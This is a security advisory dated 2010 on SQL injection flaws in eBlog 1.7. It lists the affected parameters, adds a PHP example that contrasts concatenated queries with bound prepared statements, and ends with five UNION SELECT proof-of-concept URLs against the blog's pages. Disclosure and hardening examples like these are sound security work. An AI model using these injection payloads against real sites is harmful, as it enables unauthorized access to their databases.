eBlog 1.7 Multiple SQL Injection Vulnerabilities
Name              eBlog
Vendor            https://emuci.com
Versions Affected 1.7
Author            Salvatore Fresta aka Drosophila
Website           http://www.salvatorefresta.net
Contact           salvatorefresta [at] gmail [dot] com
Date              2010-11-10
X. INDEX
I.   ABOUT THE APPLICATION
II.  DESCRIPTION
III. ANALYSIS
IV.  SAMPLE CODE
V.   FIX
I. ABOUT THE APPLICATION
________________________
eBlog is a free script that can be used to manage and
maintain personal blogs.
II. DESCRIPTION
_______________
Some parameters are not sanitised before being used in
SQL queries.
III. ANALYSIS
_____________
Summary:
A) Multiple SQL Injection
A) Multiple SQL Injection
_________________________
Input passed to "id", "keywords" and to some parameters
sent via POST method is not properly sanitised before
being used in SQL queries. This can be exploited to
manipulate SQL queries by injecting arbitrary SQL code.
Successful exploitation, only in some cases, requires
that magic_quotes_gpc is set to Off.
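Why quote escaping only matters "in some cases", and what a bound query changes, shown as an added example that is not eBlog's code or the advisory author's. The table, column and function names are hypothetical, and PDO with an in-memory SQLite database is an assumption made so the script runs on its own.

```php
<?php
// Added illustration, not eBlog source. Table, column and function names are
// hypothetical; an in-memory SQLite database (PDO) keeps it self-contained.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE comments (id INTEGER PRIMARY KEY, topic_id INTEGER, body TEXT)');
$db->exec("INSERT INTO comments (topic_id, body) VALUES (1, 'first'), (1, 'second'), (2, '100% done')");

// The pattern described above: the request value is concatenated into the SQL.
// addslashes() stands in for magic_quotes_gpc. It only escapes quote characters,
// so a value placed in an unquoted numeric position passes through unchanged.
function show_comments_unsafe(PDO $db, string $id): array {
    $sql = 'SELECT id, body FROM comments WHERE topic_id = ' . addslashes($id);
    return $db->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// Hardened: reject anything that is not a plain decimal id, then bind it.
function show_comments_safe(PDO $db, string $id): array {
    if (!ctype_digit($id)) {
        return [];
    }
    $stmt = $db->prepare('SELECT id, body FROM comments WHERE topic_id = :id');
    $stmt->bindValue(':id', (int) $id, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Hardened search: the keyword is bound, and LIKE wildcards in it are escaped
// so that "%" and "_" match literally instead of widening the search.
function search_safe(PDO $db, string $keyword): array {
    $pattern = '%' . addcslashes($keyword, '%_\\') . '%';
    $stmt = $db->prepare("SELECT id, body FROM comments WHERE body LIKE :p ESCAPE '\\'");
    $stmt->execute([':p' => $pattern]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Constructed input, shaped like the advisory's first sample URL but sized
// for the two-column query used here.
$probe = '-1 UNION SELECT 1,2';
printf("unsafe id lookup: %d row(s)\n", count(show_comments_unsafe($db, $probe)));
printf("safe id lookup:   %d row(s)\n", count(show_comments_safe($db, $probe)));
printf("safe id=1:        %d row(s)\n", count(show_comments_safe($db, '1')));
printf("safe search '%%':  %d row(s)\n", count(search_safe($db, '%')));
```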
IV. SAMPLE CODE
_______________
A) Multiple SQL Injection
The following sample code has no requirements.
http://site/path/topics.php?action=ShowComment&id=-1 UNION SELECT 1,2,3,4,5,6,7%23
The following sample codes require that magic_quotes_gpc
is set to Off:
http://site/path/pages.php?id=-1' UNION SELECT 1,2,3,4,1,6,7,1%23
http://site/path/topics.php?action=show&id=-1' UNION SELECT 1,2,3,4,5,6,7,8%23
http://site/path/sections.php?action=show&id=-1' UNION SELECT 1,2,3,4,5%23
http://site/path/search.php?keyword=%25' UNION SELECT 1,2,3,4,5,6,7,8%23
V. FIX
______
No fix.